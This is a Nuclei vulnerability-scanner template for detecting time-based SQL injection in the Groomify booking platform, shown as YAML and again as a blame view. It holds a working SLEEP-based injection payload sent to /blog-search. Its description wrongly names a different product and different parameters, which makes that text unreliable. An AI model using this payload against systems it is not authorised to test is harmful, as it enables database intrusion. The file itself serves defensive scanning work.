nuclei-templates/http/vulnerabilities/other/groomify-sqli.yaml

id: groomify-sqli

info:
  name: Groomify v1.0 - SQL Injection Vulnerability
  author: theamanrawat
  severity: high
  description: |
    An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database.
  reference:
    - https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114#
    - https://vulners.com/zdt/1337DAY-ID-38799
  metadata:
    verified: "true"
    max-request: 1
  tags: time-based-sqli,sqli,groomify,unauth

http:
  - raw:
      - |
        @timeout: 25s
        GET /blog-search?search=deneme%27%20AND%20(SELECT%201642%20FROM%20(SELECT(SLEEP(6)))Xppf)%20AND%20%27rszk%27=%27rszk HTTP/2
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 200
          - contains(header, "text/html")
          - contains(body, 'value=\"deneme')
        condition: and
# digest: 4b0a00483046022100f5673c42a32e3e6f20dd119713e652c4fa84cf2dd2cbf6893f187c87999c8277022100e3a0ad79a58479015e5f9b424277ab9fbbb0231a82d73f3b19c31a3b7d10f245:922c64590222798bb761d5b6d8e72950
templates added 2023-10-17 07:20:28 +00:00			`id: groomify-sqli`

			`info:`
			`name: Groomify v1.0 - SQL Injection Vulnerability`
			`author: theamanrawat`
			`severity: high`
			`description: \|`
			`An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database.`
			`reference:`
			`- https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114#`
			`- https://vulners.com/zdt/1337DAY-ID-38799`
			`metadata:`
			`verified: "true"`
			`max-request: 1`
updated to time-based-sqli 2024-10-15 10:27:37 +00:00			`tags: time-based-sqli,sqli,groomify,unauth`
templates added 2023-10-17 07:20:28 +00:00
			`http:`
			`- raw:`
			`- \|`
			`@timeout: 25s`
			`GET /blog-search?search=deneme%27%20AND%20(SELECT%201642%20FROM%20(SELECT(SLEEP(6)))Xppf)%20AND%20%27rszk%27=%27rszk HTTP/2`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- duration>=6`
			`- status_code == 200`
			`- contains(header, "text/html")`
			`- contains(body, 'value=\"deneme')`
			`condition: and`
chore: sign templates 🤖 2024-10-18 13:05:19 +00:00			`# digest: 4b0a00483046022100f5673c42a32e3e6f20dd119713e652c4fa84cf2dd2cbf6893f187c87999c8277022100e3a0ad79a58479015e5f9b424277ab9fbbb0231a82d73f3b19c31a3b7d10f245:922c64590222798bb761d5b6d8e72950`